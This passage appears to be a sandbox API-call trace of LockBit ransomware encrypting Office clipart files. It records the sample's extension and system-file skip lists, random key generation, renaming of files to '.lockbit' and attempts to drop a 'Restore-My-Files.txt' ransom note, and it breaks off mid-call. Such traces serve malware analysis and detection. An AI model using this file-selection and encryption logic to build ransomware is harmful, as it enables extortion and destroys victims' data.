[0175.080] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00223_.WMF") returned -1 [0175.081] lstrcmpiW (lpString1="ntldr", lpString2="SO00223_.WMF") returned -1 [0175.081] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00223_.WMF") returned -1 [0175.081] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00223_.WMF") returned -1 [0175.081] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00223_.WMF") returned -1 [0175.081] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00223_.WMF") returned 1 [0175.081] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00223_.WMF") returned -1 [0175.081] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.081] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00223_.WMF") returned=".WMF" [0175.081] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.081] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.082] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.082] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.083] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.083] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.083] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00223_.WMF.lockbit") returned 72 [0175.083] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00223_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00223_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.085] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.085] malloc (_Size=0x40068) returned 0x3df0008 [0175.086] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13890) returned 1 [0175.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.086] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.087] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.087] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.088] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00223_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00223_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.088] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.088] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.090] free (_Block=0x1fa2ed8) [0175.090] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00223_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.090] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.090] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.090] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf553ff00, ftCreationTime.dwHighDateTime=0x1bd4ae9, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf553ff00, ftLastWriteTime.dwHighDateTime=0x1bd4ae9, nFileSizeHigh=0x0, nFileSizeLow=0x476e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00257_.WMF", cAlternateFileName="")) returned 1 [0175.090] lstrcmpiW (lpString1=".", lpString2="SO00257_.WMF") returned -1 [0175.090] lstrcmpiW (lpString1="..", lpString2="SO00257_.WMF") returned -1 [0175.090] PathFindExtensionW (pszPath="SO00257_.WMF") returned=".WMF" [0175.090] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.090] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.090] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.091] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.092] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.092] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00257_.WMF") returned -1 [0175.092] lstrcmpiW (lpString1="ntldr", lpString2="SO00257_.WMF") returned -1 [0175.092] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00257_.WMF") returned -1 [0175.092] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00257_.WMF") returned -1 [0175.093] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00257_.WMF") returned -1 [0175.093] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00257_.WMF") returned 1 [0175.093] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00257_.WMF") returned -1 [0175.093] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.093] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00257_.WMF") returned=".WMF" [0175.093] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.093] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.093] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.094] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.094] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.094] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.094] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.094] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.094] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.094] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.094] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.094] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.094] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.094] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00257_.WMF.lockbit") returned 72 [0175.094] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00257_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00257_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0175.095] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.095] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.095] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=18286) returned 1 [0175.096] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.096] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.096] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.097] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.097] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.102] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00257_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00257_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.102] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.102] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.104] free (_Block=0x1fa2ed8) [0175.104] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00257_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.104] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.104] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.104] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7c6d00, ftCreationTime.dwHighDateTime=0x1bd4b13, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8f7c6d00, ftLastWriteTime.dwHighDateTime=0x1bd4b13, nFileSizeHigh=0x0, nFileSizeLow=0xd8e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00289_.WMF", cAlternateFileName="")) returned 1 [0175.104] lstrcmpiW (lpString1=".", lpString2="SO00289_.WMF") returned -1 [0175.104] lstrcmpiW (lpString1="..", lpString2="SO00289_.WMF") returned -1 [0175.104] PathFindExtensionW (pszPath="SO00289_.WMF") returned=".WMF" [0175.104] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.104] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.104] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.104] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.104] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.104] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.104] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.104] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.104] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.104] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.105] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.105] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.106] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00289_.WMF") returned -1 [0175.106] lstrcmpiW (lpString1="ntldr", lpString2="SO00289_.WMF") returned -1 [0175.106] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00289_.WMF") returned -1 [0175.106] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00289_.WMF") returned -1 [0175.106] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00289_.WMF") returned -1 [0175.106] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00289_.WMF") returned 1 [0175.106] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00289_.WMF") returned -1 [0175.106] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.106] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00289_.WMF") returned=".WMF" [0175.107] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.107] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.107] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.108] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.108] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.108] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.108] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.108] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00289_.WMF.lockbit") returned 72 [0175.108] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00289_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00289_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.109] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.109] malloc (_Size=0x40068) returned 0x3df0008 [0175.109] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=55520) returned 1 [0175.109] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.110] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.110] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.110] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.110] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.116] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00289_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft 